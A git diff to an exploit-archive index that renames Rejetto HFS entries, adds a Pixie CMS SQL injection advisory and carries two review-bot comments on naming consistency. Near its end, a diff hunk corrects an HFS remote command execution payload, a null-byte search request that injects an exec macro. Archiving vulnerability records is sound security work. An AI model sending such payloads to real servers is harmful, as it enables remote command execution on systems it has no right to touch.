diff --git a/files.csv b/files.csv
index e8f37a75a..2acc763ee 100755
--- a/files.csv
+++ b/files.csv
@@ -25886,7 +25886,7 @@ id,file,description,date,author,platform,type,port
 28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include Vulnerability",2006-11-01,Arab4services,php,webapps,0
 28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.PHP Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0
 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0
-28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
+28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0
 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0
 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0
 28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0
@@ -27668,7 +27668,7 @@ id,file,description,date,author,platform,type,port
 30847,platforms/php/webapps/30847.txt,"phpMyChat 0.14.5 chat/users_popupL.php3 Multiple Parameter XSS",2007-12-04,beenudel1986,php,webapps,0
 30848,platforms/php/webapps/30848.txt,"Joomla 1.5 RC3 com_content index.php view Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
 30849,platforms/php/webapps/30849.txt,"Joomla 1.5 RC3 com_search Component index.php Multiple Parameter SQL Injection",2007-12-05,beenudel1986,php,webapps,0
-30850,platforms/multiple/remote/30850.txt,"HFS HTTP File Server 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
+30850,platforms/multiple/remote/30850.txt,"Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload Vulnerability",2007-12-05,"Luigi Auriemma",multiple,remote,0
 30851,platforms/php/webapps/30851.txt,"VisualShapers ezContents 1.4.5 File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0
 30852,platforms/php/webapps/30852.txt,"Kayako SupportSuite 3.0.32 PHP_SELF Trigger_Error Function Cross-Site Scripting Vulnerability",2007-12-06,imei,php,webapps,0
 30853,platforms/php/webapps/30853.txt,"OpenNewsletter 2.5 Compose.PHP Cross-Site Scripting Vulnerability",2007-12-06,Manu,php,webapps,0
@@ -27863,7 +27863,7 @@ id,file,description,date,author,platform,type,port
 31053,platforms/php/remote/31053.php,"PHP <= 5.2.5 cURL 'safe mode' Security Bypass Vulnerability",2008-01-23,"Maksymilian Arciemowicz",php,remote,0
 31054,platforms/linux/dos/31054.txt,"SDL_image 1.2.6 Invalid GIF File LWZ Minimum Code Size Remote Buffer Overflow Vulnerability",2008-01-23,"Gynvael Coldwind",linux,dos,0
 31055,platforms/asp/webapps/31055.txt,"Multiple Web Wiz Products Remote Information Disclosure Vulnerability",2008-01-23,"AmnPardaz ",asp,webapps,0
-31056,platforms/windows/remote/31056.py,"HFS HTTP File Server 1.5/2.x Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
+31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 31057,platforms/osx/dos/31057.html,"Apple iPhone Mobile Safari Memory Exhaustion Remote Denial of Service Vulnerability",2008-01-24,fuzion,osx,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts 'user_login.asp' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
 31059,platforms/asp/webapps/31059.txt,"E-SMART CART 'Members Login' Multiple SQL Injection Vulnerabilies",2008-01-25,milad_sa2007,asp,webapps,0
@@ -31218,7 +31218,7 @@ id,file,description,date,author,platform,type,port
 34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include Vulnerability",2014-09-15,Vulnerability-Lab,ios,webapps,0
 34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
 34667,platforms/linux/shellcode/34667.c,"Connect Back Shellcode - 139 bytes",2014-09-15,MadMouse,linux,shellcode,0
-34668,platforms/windows/remote/34668.txt,"HFS HTTP File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
+34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
 34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
 34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
@@ -31388,7 +31388,7 @@ id,file,description,date,author,platform,type,port
 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 'req' Parameter Local and Remote File Include Vulnerabilities",2010-01-19,indoushka,php,webapps,0
 34850,platforms/php/webapps/34850.txt,"eXV2 CMS Multiple Cross Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0
 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php, jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80
-34852,platforms/php/webapps/34852.txt,"HTTP File Server 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",php,webapps,80
+34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a, 2.3b, 2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80
 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 'trigger.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
 34854,platforms/php/webapps/34854.txt,"All In One Wordpress Firewall 3.8.3 - Persistent XSS Vulnerability",2014-10-02,Vulnerability-Lab,php,webapps,80
 34855,platforms/windows/dos/34855.pl,"ALPHA Player 2.4 '.bmp' File Buffer Overflow Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
@@ -31740,3 +31740,4 @@ id,file,description,date,author,platform,type,port
 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0
 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0
 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0
+35251,platforms/php/webapps/35251.txt,"Pixie CMS 1.0.4 'admin/index.php' SQL Injection Vulnerability",2011-01-20,"High-Tech Bridge SA",php,webapps,0
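Review bot: The corrected 34852 row keeps type `webapps`, while 34668 is filed as `remote`. 34668 is modified earlier in this diff and has the same product, author, port and "Remote Command Execution" title. If the two entries describe the same flaw, as the titles suggest, anyone filtering the index by platform and type to assess an HFS deployment will find only one of them. Consider aligning the type (and the path, e.g. `platforms/windows/remote/34852.txt`) or marking one title as a duplicate of the other.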
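Review bot: The new 35251 row gives the version as `1.0.4`, but the advisory text added in platforms/php/webapps/35251.txt says `Pixie CMS 1.04`. Confirm which form the vendor uses and write it the same way in both places, so version lookups against the index match the write-up. The title also lacks the ` - ` separator between product/version and issue that this same commit adds to the 28895, 30850 and 31056 rows. Suggested title: `"Pixie CMS 1.0.4 - 'admin/index.php' SQL Injection Vulnerability"`.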
diff --git a/platforms/php/webapps/35251.txt b/platforms/php/webapps/35251.txt
new file mode 100755
index 000000000..7383932ba
--- /dev/null
+++ b/platforms/php/webapps/35251.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/45937/info
+
+Pixie is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+Pixie CMS 1.04 is vulnerable; other versions may also be affected.
+
+NOTE (May 10, 2011): This BID was previously titled 'Pixie Multiple SQL Injection Vulnerabilities'. It has been re-written because one of the vulnerabilities duplicates an issue described in BID 34189 (Pixie CMS SQL Injection and Cross Site Scripting Vulnerabilities).
+
+
+
+
+
+
+
+
+ diff --git a/platforms/windows/remote/34668.txt b/platforms/windows/remote/34668.txt index 29175a54f..dbcfe669d 100755 --- a/platforms/windows/remote/34668.txt +++ b/platforms/windows/remote/34668.txt @@ -18,7 +18,7 @@ begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end; it will not handle null byte so a request to -http://localhost:80/search=%00{.exec|cmd.} +http://localhost:80/?search=%00{.exec|cmd.} will stop regex from parse macro , and macro will be executed and remote code injection happen. diff --git a/platforms/php/webapps/34852.txt b/platforms/windows/webapps/34852.txt similarity index 100% rename from platforms/php/webapps/34852.txt rename to platforms/windows/webapps/34852.txt